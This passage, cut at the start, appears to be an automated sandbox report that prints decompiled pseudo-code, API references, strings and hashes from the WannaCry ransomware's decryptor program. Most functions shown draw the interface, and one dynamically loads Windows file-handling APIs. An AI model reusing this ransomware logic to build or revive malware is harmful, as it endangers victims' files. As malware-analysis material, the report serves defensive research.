				E00403F20(__ecx + 0x870);
				_v4 = 0x17;
				 *((intOrPtr*)(__ecx + 0x868)) = 0x415a44;
				E00403F20(__ecx + 0x868);
				_v4 = 0x16;
				 *((intOrPtr*)(__ecx + 0x860)) = 0x415a44;
				E00403F20(__ecx + 0x860);
				_v4 = 0x15;
				 *((intOrPtr*)(__ecx + 0x858)) = 0x415a44;
				E00403F20(__ecx + 0x858);
				_t125 = __ecx + 0x850;
				_v16 = _t125;
				 *_t125 = 0x415c00;
				_v4 = 0x21;
				L00412D52();
				 *_t125 = 0x415bec;
				_v4 = 0x13;
				 *((intOrPtr*)(__ecx + 0x848)) = 0x415a44;
				E00403F20(__ecx + 0x848);
				_v4 = 0x12;
				 *((intOrPtr*)(__ecx + 0x840)) = 0x415a44;
				E00403F20(__ecx + 0x840);
				_v4 = 0x11;
				 *((intOrPtr*)(__ecx + 0x838)) = 0x415a44;
				E00403F20(__ecx + 0x838);
				_t126 = __ecx + 0x830;
				_v16 = _t126;
				 *_t126 = 0x415c00;
				_v4 = 0x22;
				L00412D52();
				 *_t126 = 0x415bec;
				_v4 = 0xf;
				L00412CC2();
				_v4 = 0xe;
				L00412CC2();
				_v4 = 0xd;
				L00412CC2();
				_v4 = 0xc;
				L00412CC2();
				_v4 = 0xb;
				L00412EF6();
				_v4 = 0xa;
				E004050A0(__ecx + 0x444);
				_v4 = 9;
				E004050A0(__ecx + 0x3c8);
				_v4 = 8;
				E00404170(__ecx + 0x360);
				_v4 = 7;
				E00404170(__ecx + 0x2f8);
				_v4 = 6;
				E00404170(__ecx + 0x290);
				_v4 = 5;
				E00404170(__ecx + 0x228);
				_t127 = __ecx + 0x1a4;
				_v16 = _t127;
				 *_t127 = 0x4161a4;
				_v4 = 0x23;
				L00412F0E();
				_v4 = 4;
				L00412C9E();
				_v4 = 3;
				_t86 = E00405D90(__ecx + 0x120);
				_v4 = 2;
				L00412EF0();
				_v4 = 1;
				L00412EF0();
				_v4 = 0;
				L00412D4C();
				_v4 = 0xffffffff;
				L00412C86();
				 *[fs:0x0] = _v12;
				return _t86;
			}

0x00405e10
0x00405e12
0x00405e1d
0x00405e1e
0x00405e2c
0x00405e30
0x00405e38
0x00405e3e
0x00405e42
0x00405e4a
0x00405e4f
0x00405e54
0x00405e5a
0x00405e60
0x00405e64
0x00405e6c
0x00405e71
0x00405e76
0x00405e7c
0x00405e82
0x00405e86
0x00405e8e
0x00405e93
0x00405e98
0x00405e9e
0x00405ea4
0x00405ea8
0x00405eb0
0x00405eb5
0x00405ec0
0x00405ec6
0x00405ecb
0x00405ed1
0x00405edc
0x00405ee1
0x00405ee7
0x00405ef2
0x00405ef7
0x00405efd
0x00405f08
0x00405f0d
0x00405f13
0x00405f18
0x00405f1e
0x00405f22
0x00405f2a
0x00405f2f
0x00405f3a
0x00405f40
0x00405f45
0x00405f4b
0x00405f56
0x00405f5b
0x00405f61
0x00405f6c
0x00405f71
0x00405f77
0x00405f7c
0x00405f82
0x00405f86
0x00405f8e
0x00405f93
0x00405f9e
0x00405fa4
0x00405fa9
0x00405fb4
0x00405fb9
0x00405fc4
0x00405fc9
0x00405fd4
0x00405fd9
0x00405fe4
0x00405fe9
0x00405ff4
0x00405ff9
0x00406004
0x00406009
0x00406014
0x00406019
0x00406024
0x00406029
0x00406034
0x00406039
0x00406044
0x00406049
0x0040604e
0x00406054
0x00406058
0x00406061
0x00406066
0x0040606d
0x00406072
0x0040607d
0x00406082
0x0040608d
0x00406092
0x0040609d
0x004060a2
0x004060aa
0x004060af
0x004060b6
0x004060be
0x004060c9
0x004060d3

APIs

#2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405E4F
#2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405E71
#2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405E93
#2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405EB5

Part of subcall function 00403F20: #2414.MFC42(?,?,?,004136B8,000000FF,00403F08), ref: 00403F4B

#2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405F2F
#2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405F93
#800.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405FA9
#800.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405FB9
#800.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405FC9
#800.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405FD9
#781.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405FE9

Part of subcall function 004050A0: #800.MFC42(?,?,?,004138A8,000000FF,00405088), ref: 004050CE
Part of subcall function 004050A0: #795.MFC42(?,?,?,004138A8,000000FF,00405088), ref: 004050DD

Part of subcall function 00404170: #2414.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041B2
Part of subcall function 00404170: #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041C5
Part of subcall function 00404170: #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041D2
Part of subcall function 00404170: #795.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041E1

#654.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00406066
#765.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00406072

Part of subcall function 00405D90: #654.MFC42(00415A44,?,00000000,00413A88,000000FF,00405D14), ref: 00405DBE
Part of subcall function 00405D90: #765.MFC42(00415A44,?,00000000,00413A88,000000FF,00405D14), ref: 00405DCD

#609.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00406092
#609.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 004060A2
#616.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 004060AF
#641.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 004060BE

Strings

#, xrefs: 00406061

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: #2414$#800$#609#654#765#795$#616#641#781
String ID: #
API String ID: 2377847243-1885708031
Opcode ID: 0807114d2ea519295407346a987a160cd163468119fa121364e43a1f09c9544f
Instruction ID: 200a364df958368678b01019567048f7f095356612ddb79f46c50176d87071e4
Opcode Fuzzy Hash: 0807114d2ea519295407346a987a160cd163468119fa121364e43a1f09c9544f
Instruction Fuzzy Hash: C4710A74008782CED305EF65C0453DAFFE4AFA5348F54484EE0DA57292DBB86299CBE6

Uniqueness

Uniqueness Score: -1.00%

Function 004032C0 Relevance: 31.6, APIs: 16, Strings: 2, Instructions: 114
windowCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E004032C0(intOrPtr __ecx) {
				intOrPtr _t16;
				long _t17;
				struct HFONT__* _t19;
				long _t20;
				long _t21;
				long _t23;
				int _t35;
				int _t38;
				int _t40;
				int _t47;
				intOrPtr _t48;

				_t48 = __ecx;
				L00412CB0();
				_t16 =  *0x42189c; // 0x0
				_t17 =  *(_t16 + 0x824);
				 *(__ecx + 0xe8) = _t17;
				_push(CreateSolidBrush(_t17));
				L00412D5E();
				_t47 = __ecx + 0xec;
				_t19 = CreateFontA(0x10, 0, 0, 0, 0x2bc, 0, 0, 0, 0, 0, 0, 0, 0x20, "Arial");
				_push(_t19);
				L00412D5E();
				_push(0x408);
				L00412CE6();
				if(_t47 != 0) {
					_t35 =  *(_t47 + 4);
				} else {
					_t35 = 0;
				}
				_t20 = SendMessageA( *(_t19 + 0x20), 0x30, _t35, 1);
				_push(0x409);
				L00412CE6();
				if(_t47 != 0) {
					_t38 =  *(_t47 + 4);
				} else {
					_t38 = 0;
				}
				_t21 = SendMessageA( *(_t20 + 0x20), 0x30, _t38, 1);
				_push(2);
				L00412CE6();
				if(_t47 != 0) {
					_t40 =  *(_t47 + 4);
				} else {
					_t40 = 0;
				}
				_t23 = SendMessageA( *(_t21 + 0x20), 0x30, _t40, 1);
				_push(0x40e);
				L00412CE6();
				if(_t47 != 0) {
					_t47 =  *(_t47 + 4);
				}
				SendMessageA( *(_t23 + 0x20), 0x30, _t47, 1);
				E00403CB0(_t48);
				SendMessageA( *(_t48 + 0xc0), 0x14e, 0, 0);
				_push(0xffffffff);
				_push(0xffffffff);
				_push(0);
				_push("Path");
				_push(0);
				L00412D58();
				SendMessageA( *(_t48 + 0x80), 0x101e, 0, 0x1f4);
				 *0x4217bc = _t48;
				return 1;
			}

0x004032c3
0x004032c5
0x004032ca
0x004032cf
0x004032d6
0x004032e2
0x004032e9
0x00403310
0x00403316
0x0040331c
0x0040331f
0x00403324
0x0040332b
0x00403332
0x00403338
0x00403334
0x00403334
0x00403334
0x0040334a
0x0040334c
0x00403353
0x0040335a
0x00403360
0x0040335c
0x0040335c
0x0040335c
0x0040336c
0x0040336e
0x00403372
0x00403379
0x0040337f
0x0040337b
0x0040337b
0x0040337b
0x0040338b
0x0040338d
0x00403394
0x0040339b
0x0040339d
0x0040339d
0x004033a9
0x004033ad
0x004033c2
0x004033c4
0x004033c6
0x004033c8
0x004033ca
0x004033cf
0x004033d4
0x004033ec
0x004033ee
0x004033fc

APIs

#4710.MFC42 ref: 004032C5
CreateSolidBrush.GDI32(?), ref: 004032DC
#1641.MFC42(00000000), ref: 004032E9
CreateFontA.GDI32(00000010,00000000,00000000,00000000,000002BC,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000020,Arial), ref: 00403316
#1641.MFC42(00000000), ref: 0040331F
#3092.MFC42(00000408,00000000), ref: 0040332B
SendMessageA.USER32(?,00000030,?,00000001), ref: 0040334A
#3092.MFC42(00000409), ref: 00403353
SendMessageA.USER32(?,00000030,?,00000001), ref: 0040336C
#3092.MFC42(00000002), ref: 00403372
SendMessageA.USER32(?,00000030,?,00000001), ref: 0040338B
#3092.MFC42(0000040E), ref: 00403394
SendMessageA.USER32(?,00000030,?,00000001), ref: 004033A9
SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 004033C2
#3996.MFC42(00000000,Path,00000000,000000FF,000000FF), ref: 004033D4
SendMessageA.USER32(?,0000101E,00000000,000001F4), ref: 004033EC

Strings

Path, xrefs: 004033CA
Arial, xrefs: 004032EE

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: MessageSend$#3092$#1641Create$#3996#4710BrushFontSolid
String ID: Arial$Path
API String ID: 2448086372-1872211634
Opcode ID: 54367d22f402edf92e4263bf03619f0e020ba41dcf2f2cd55327d399c3bd1a02
Instruction ID: b960ea7794e319caf0268359e71fff6d42033abaa4d887be80586a06fbef81fd
Opcode Fuzzy Hash: 54367d22f402edf92e4263bf03619f0e020ba41dcf2f2cd55327d399c3bd1a02
Instruction Fuzzy Hash: 4831D5B13907107BE6249760CD83FAE6659BB84B10F20421EB756BF2D1CEF8AD41879C

Uniqueness

Uniqueness Score: -1.00%

Function 00406AE0 Relevance: 29.8, APIs: 14, Strings: 3, Instructions: 78
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E00406AE0(void* __ecx) {
				char _v4;
				char _v12;
				char _v24;
				char _v28;
				intOrPtr _v36;
				char _v40;
				void* _v280;
				char _v284;
				char _v288;
				char _v292;
				void* _v296;
				char _v300;
				intOrPtr _v304;
				char _v308;
				void* _v312;
				void* _v316;
				char** _t26;
				long _t30;
				void* _t31;
				char** _t32;
				void* _t56;
				intOrPtr _t58;
				void* _t60;

				_push(0xffffffff);
				_push(E00413E61);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t58;
				_t56 = __ecx;
				L00412DA6();
				_t26 =  &_v284;
				_push(_t26);
				_v4 = 0;
				L00412DD6();
				_push("msg\\");
				L00412CAA();
				_push("m_%s.wnry");
				_push(_t26);
				_push( &_v288);
				_v12 = 1;
				L00412CCE();
				sprintf( &_v292,  *_t26, _v304);
				_t60 = _t58 - 0x110 + 0xc;
				L00412CC2();
				_v24 = 0;
				L00412CC2();
				_t30 = GetFileAttributesA( &_v292);
				if(_t30 == 0xffffffff) {
					_push("msg\\");
					L00412CAA();
					_push("m_%s.wnry");
					_push(_t30);
					_t32 =  &_v300;
					_v28 = 2;
					_push(_t32);
					L00412CCE();
					sprintf( &_v308,  *_t32, "English");
					_t60 = _t60 + 0xc;
					L00412CC2();
					_v40 = 0;
					L00412CC2();
				}
				_t31 = E00406CF0(_t56,  &_v292);
				_v28 = 0xffffffff;
				L00412CC2();
				 *[fs:0x0] = _v36;
				return _t31;
			}

0x00406ae0
0x00406ae2
0x00406aed
0x00406aee
0x00406afc
0x00406b03
0x00406b08
0x00406b0f
0x00406b10
0x00406b1b
0x00406b20
0x00406b29
0x00406b2e
0x00406b37
0x00406b38
0x00406b39
0x00406b41
0x00406b59
0x00406b5b
0x00406b62
0x00406b6b
0x00406b73
0x00406b7d
0x00406b86
0x00406b88
0x00406b91
0x00406b96
0x00406b9b
0x00406b9c
0x00406ba0
0x00406ba8
0x00406ba9
0x00406bbb
0x00406bbd
0x00406bc4
0x00406bcd
0x00406bd5
0x00406bd5
0x00406be1
0x00406bea
0x00406bf5
0x00406c03
0x00406c10

APIs

#540.MFC42(?,755720C0), ref: 00406B03
#3874.MFC42 ref: 00406B1B
#537.MFC42(msg\), ref: 00406B29
#924.MFC42(?,00000000,m_%s.wnry,msg\), ref: 00406B41
sprintf.MSVCRT ref: 00406B59
#800.MFC42(?,?,755720C0), ref: 00406B62
#800.MFC42 ref: 00406B73
GetFileAttributesA.KERNEL32(?), ref: 00406B7D
#537.MFC42(msg\), ref: 00406B91
#924.MFC42(?,00000000,m_%s.wnry,msg\), ref: 00406BA9
sprintf.MSVCRT ref: 00406BBB
#800.MFC42(?,?,?,?,?,755720C0), ref: 00406BC4
#800.MFC42 ref: 00406BD5
#800.MFC42(?), ref: 00406BF5

Strings

m_%s.wnry, xrefs: 00406B2E, 00406B96
English, xrefs: 00406BB0
msg\, xrefs: 00406B20, 00406B88

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: #800$#537#924sprintf$#3874#540AttributesFile
String ID: English$m_%s.wnry$msg\
API String ID: 3713669620-4206458537
Opcode ID: f36c2dcfbfc0b931c038135b008570d0ce4cdd6941e9a910e96e45ef17743a79
Instruction ID: 3ad7a17867ea9436e9d42ea8b12d154e8c58dea708134770199309aae3637b36
Opcode Fuzzy Hash: f36c2dcfbfc0b931c038135b008570d0ce4cdd6941e9a910e96e45ef17743a79
Instruction Fuzzy Hash: 4A316170108341AEC324EB25D941FDE77A4BBA8714F404E1EF59AC32D1EB789558CAA7

Uniqueness

Uniqueness Score: -1.00%

Function 00402C40 Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 72
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402C40() {
				_Unknown_base(*)()* _t11;
				struct HINSTANCE__* _t23;

				if(E00404B70() == 0) {
					L12:
					return 0;
				} else {
					if( *0x4217a0 == 0) {
						_t23 = LoadLibraryA("kernel32.dll");
						if(_t23 == 0) {
							goto L12;
						} else {
							 *0x4217a0 = GetProcAddress(_t23, "CreateFileW");
							 *0x4217a4 = GetProcAddress(_t23, "WriteFile");
							 *0x4217a8 = GetProcAddress(_t23, "ReadFile");
							 *0x4217ac = GetProcAddress(_t23, "MoveFileW");
							 *0x4217b0 = GetProcAddress(_t23, "MoveFileExW");
							 *0x4217b4 = GetProcAddress(_t23, "DeleteFileW");
							_t11 = GetProcAddress(_t23, "CloseHandle");
							 *0x4217b8 = _t11;
							if( *0x4217a0 == 0 ||  *0x4217a4 == 0 ||  *0x4217a8 == 0 ||  *0x4217ac == 0 ||  *0x4217b0 == 0 ||  *0x4217b4 == 0 || _t11 == 0) {
								goto L12;
							} else {
								return 1;
							}
						}
					} else {
						return 1;
					}
				}
			}

0x00402c48
0x00402d1d
0x00402d20
0x00402c4e
0x00402c55
0x00402c69
0x00402c6d
0x00000000
0x00402c73
0x00402c88
0x00402c95
0x00402ca2
0x00402caf
0x00402cbc
0x00402cc9
0x00402cce
0x00402cd6
0x00402cde
0x00000000
0x00402d16
0x00402d1c
0x00402d1c
0x00402cde
0x00402c57
0x00402c5d
0x00402c5d
0x00402c55

APIs

LoadLibraryA.KERNEL32(kernel32.dll), ref: 00402C63
GetProcAddress.KERNEL32(00000000,CreateFileW), ref: 00402C80
GetProcAddress.KERNEL32(00000000,WriteFile), ref: 00402C8D
GetProcAddress.KERNEL32(00000000,ReadFile), ref: 00402C9A
GetProcAddress.KERNEL32(00000000,MoveFileW), ref: 00402CA7
GetProcAddress.KERNEL32(00000000,MoveFileExW), ref: 00402CB4
GetProcAddress.KERNEL32(00000000,DeleteFileW), ref: 00402CC1
GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 00402CCE

Strings

MoveFileW, xrefs: 00402C9C
DeleteFileW, xrefs: 00402CB6
CreateFileW, xrefs: 00402C7A
WriteFile, xrefs: 00402C82
ReadFile, xrefs: 00402C8F
kernel32.dll, xrefs: 00402C5E
MoveFileExW, xrefs: 00402CA9
CloseHandle, xrefs: 00402CC3

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: CloseHandle$CreateFileW$DeleteFileW$MoveFileExW$MoveFileW$ReadFile$WriteFile$kernel32.dll
API String ID: 2238633743-1294736154
Opcode ID: 468b1d099fd8a0684a95be66b91aae829347793d9c58d8a41e664e10bf98f029
Instruction ID: a2b5d8bb757b14b28e15fb80ad1863100e1319e91a413c2d323d0fcc62a15203
Opcode Fuzzy Hash: 468b1d099fd8a0684a95be66b91aae829347793d9c58d8a41e664e10bf98f029
Instruction Fuzzy Hash: AA110334B423216BD734AB25BD58FA72695EFD4701795003FA801E76E1D7B89C42CA5C

Uniqueness

Uniqueness Score: -1.00%

Function 00405580 Relevance: 27.2, APIs: 18, Instructions: 187
windowCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00405580(void* __ecx) {
				int _v8;
				intOrPtr _v12;
				char _v28;
				char _v80;
				void* _v96;
				struct tagRECT _v112;
				signed int _v116;
				void* _v120;
				struct HDC__* _v140;
				long _v144;
				struct tagRECT _v160;
				char _v164;
				void* _v172;
				intOrPtr _v176;
				char _v188;
				int _v192;
				int _v196;
				int _v204;
				intOrPtr _v212;
				void* _v216;
				struct HBRUSH__* _v220;
				char _v224;
				intOrPtr _v228;
				void* _v244;
				intOrPtr _v248;
				intOrPtr _v252;
				signed int _v256;
				void* _v260;
				void* _v264;
				void* _v268;
				int _v272;
				intOrPtr _v296;
				intOrPtr _v300;
				intOrPtr _v304;
				int _t78;
				long _t79;
				struct HBRUSH__* _t80;
				struct HDC__* _t84;
				char _t85;
				struct HBRUSH__* _t86;
				intOrPtr _t89;
				intOrPtr _t90;
				intOrPtr _t102;
				intOrPtr _t104;
				intOrPtr _t108;
				intOrPtr _t136;
				void* _t151;
				struct HBRUSH__* _t152;
				void* _t153;
				void* _t156;
				int _t160;
				intOrPtr _t162;

				_push(0xffffffff);
				_push(E00413943);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t162;
				_t156 = __ecx;
				_t78 = GetClientRect( *(__ecx + 0x20),  &_v112);
				_t160 = 0;
				_v204 = 0;
				_t108 =  *((intOrPtr*)( *((intOrPtr*)(_t156 + 0x44)) - 8));
				_v176 = _t108;
				if(_t108 != 0) {
					L00412DD0();
					_t79 =  *(_t156 + 0x50);
					_v8 = 0;
					_v164 = 0xffb53f;
					_v160.left = _t79;
					_v160.top = 0x674017;
					_v160.right =  *((intOrPtr*)(_t156 + 0x4c));
					_v160.bottom = 0;
					_v144 =  *(_t156 + 0x54);
					L00412E5A();
					_t80 =  *((intOrPtr*)(_t79 + 8));
					__imp__#8(_t80,  *((intOrPtr*)(_t156 + 0x58)), 0,  &_v164, 3, _t156, _t151);
					_t152 = _t80;
					_v220 = _t152;
					L00412E54();
					asm("sbb eax, eax");
					_v28 = 1;
					_t84 = CreateCompatibleDC( ~( &_v120) & _v116);
					_push(_t84);
					L00412E4E();
					_push(_t152);
					L00412DE2();
					if(_t84 != 0) {
						_t84 =  *(_t84 + 4);
					}
					_push(_t84);
					_t85 = _v224;
					_push(_t85);
					L00412E48();
					_v212 = _t85;
					_t153 = 0;
					_v252 = 1;
					_t86 = CreateSolidBrush( *(_t156 + 0x54));
					_v220 = _t86;
					FillRect(_v140,  &_v160, _t86);
					_t89 = 0;
					_v260 = 0;
					if(_t108 > 0) {
						do {
							_v224 =  *((intOrPtr*)( *((intOrPtr*)(_t156 + 0x44)) + _t89));
							E00405110(_t156,  &_v188, _v224);
							asm("sbb eax, eax");
							BitBlt(_v160, _t160, _v272,  *((intOrPtr*)(_t156 + 0x60)) +  *((intOrPtr*)(_t156 + 0x68)),  *((intOrPtr*)(_t156 + 0x64)) +  *((intOrPtr*)(_t156 + 0x6c)),  ~( &_v260) & _v256, _v196, _v192, 0xcc0020);
							_t102 =  *((intOrPtr*)(_t156 + 0x74));
							_t160 = _t160 +  *((intOrPtr*)(_t156 + 0x60)) +  *((intOrPtr*)(_t156 + 0x68));
							_t153 = _t153 + 1;
							if(_t153 != _t102) {
								goto L10;
							} else {
								_t136 =  *((intOrPtr*)(_t156 + 0x70));
								if(_t136 != 1) {
									if(_t153 != _t102) {
										goto L10;
									} else {
										_t104 = _t136;
										if(_t104 <= 1) {
											goto L10;
										} else {
											if(_v304 != _t104) {
												_t153 = 0;
												_t160 = 0;
												_v300 = _v300 +  *((intOrPtr*)(_t156 + 0x64)) +  *((intOrPtr*)(_t156 + 0x6c));
												_v304 = _v304 + 1;
												goto L10;
											}
										}
									}
								}
							}
							goto L11;
							L10:
							_t89 = _v296 + 1;
							_v296 = _t89;
						} while (_t89 < _v272);
					}
					L11:
					_t90 = _v228;
					if(_t90 != 0) {
						_t90 =  *((intOrPtr*)(_t90 + 4));
					}
					_push(_t90);
					_push(_v248);
					L00412E48();
					L00412E42();
					DeleteObject(_v264);
					_t78 = DeleteObject(_v244);
					_v80 = 0;
					L00412E3C();
					_v80 = 0xffffffff;
					L00412DB8();
				}
				 *[fs:0x0] = _v12;
				return _t78;
			}

0x00405580
0x00405582
0x0040558d
0x0040558e
0x0040559e
0x004055a9
0x004055b2
0x004055b4
0x004055b8
0x004055bd
0x004055c1
0x004055d0
0x004055d5
0x004055de
0x004055e5
0x004055ed
0x004055f1
0x004055f9
0x004055fd
0x00405601
0x00405605
0x0040560d
0x0040561a
0x00405620
0x00405626
0x0040562a
0x0040563f
0x00405641
0x0040564c
0x00405652
0x00405657
0x0040565c
0x0040565d
0x00405664
0x00405666
0x00405666
0x00405669
0x0040566a
0x0040566e
0x0040566f
0x00405677
0x0040567c
0x0040567e
0x00405686
0x0040568c
0x0040569e
0x004056a4
0x004056a8
0x004056ac
0x004056b2
0x004056bc
0x004056c8
0x004056e7
0x0040570b
0x00405719
0x0040571c
0x0040571e
0x00405721
0x00000000
0x00405723
0x00405723
0x00405729
0x0040572d
0x00000000
0x0040572f
0x0040572f
0x00405734
0x00000000
0x00405736
0x0040573a
0x0040574c
0x0040574e
0x00405753
0x00405757
0x00000000
0x00405757
0x0040573a
0x00405734
0x0040572d
0x00405729
0x00000000
0x0040575b
0x00405763
0x00405766
0x00405766
0x004056b2
0x00405770
0x00405770
0x00405777
0x00405779
0x00405779
0x0040577c
0x00405781
0x00405782
0x0040578b
0x0040579b
0x004057a2
0x004057a8
0x004057b0
0x004057b9
0x004057c4
0x004057c4
0x004057d3
0x004057e0

APIs

GetClientRect.USER32(?,?), ref: 004055A9
#470.MFC42 ref: 004055D0
#1168.MFC42 ref: 00405605
#8.COMCTL32(?,?,00000000,00FFB53F,00000003), ref: 0040561A
#323.MFC42 ref: 0040562A
CreateCompatibleDC.GDI32(?), ref: 0040564C
#1640.MFC42(00000000), ref: 00405657
#2860.MFC42(00000000,00000000), ref: 0040565D
#5785.MFC42(?,00000000,00000000,00000000), ref: 0040566F
CreateSolidBrush.GDI32(?), ref: 00405686
FillRect.USER32(?,?,00000000), ref: 0040569E
BitBlt.GDI32(?,00000000,?,?,?,?,?,?,00CC0020), ref: 0040570B
#5785.MFC42(?,?), ref: 00405782
#2405.MFC42(?,?), ref: 0040578B
DeleteObject.GDI32(?), ref: 0040579B
DeleteObject.GDI32(?), ref: 004057A2
#640.MFC42 ref: 004057B0
#755.MFC42 ref: 004057C4

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: #5785CreateDeleteObjectRect$#1168#1640#2405#2860#323#470#640#755BrushClientCompatibleFillSolid
String ID:
API String ID: 1233696098-0
Opcode ID: 3787f29b2f3b6759b14921245bb0c5350f6533f71f74a9e78965702df0d7f065
Instruction ID: b627e9c1237585dd637a27707791d59f98fdace04f8481d3914a5fbe5096edf5
Opcode Fuzzy Hash: 3787f29b2f3b6759b14921245bb0c5350f6533f71f74a9e78965702df0d7f065
Instruction Fuzzy Hash: 057135716087419FC324DF69C984AABB7E9FB88704F004A2EF59AC3350DB74E845CB66

Uniqueness

Uniqueness Score: -1.00%

Function 00408D70 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 257
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00408D70(intOrPtr __ecx, signed long long __fp0, intOrPtr* _a4, int _a8, signed int _a12, unsigned int _a16, signed int _a20) {
				intOrPtr _v0;
				unsigned int _v4;
				unsigned int _v8;
				unsigned int _v12;
				intOrPtr _v20;
				char _v36;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v64;
				char _v68;
				unsigned int _v72;
				signed int _v76;
				signed int _v80;
				intOrPtr _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed long long _v100;
				intOrPtr _v104;
				void* _v108;
				void* _v112;
				void* _v120;
				unsigned int _t93;
				signed int _t96;
				signed int _t100;
				unsigned int _t102;
				signed int _t107;
				int _t112;
				char _t113;
				signed char _t115;
				RECT* _t122;
				signed int _t125;
				signed int _t134;
				intOrPtr* _t135;
				unsigned int _t138;
				signed int _t140;
				signed int _t143;
				intOrPtr* _t146;
				char _t151;
				char _t152;
				signed int _t169;
				intOrPtr* _t177;
				signed int _t192;
				intOrPtr* _t193;
				intOrPtr _t195;
				unsigned int _t202;
				char _t209;
				intOrPtr _t210;
				signed long long _t228;
				signed long long _t229;
				signed long long _t230;
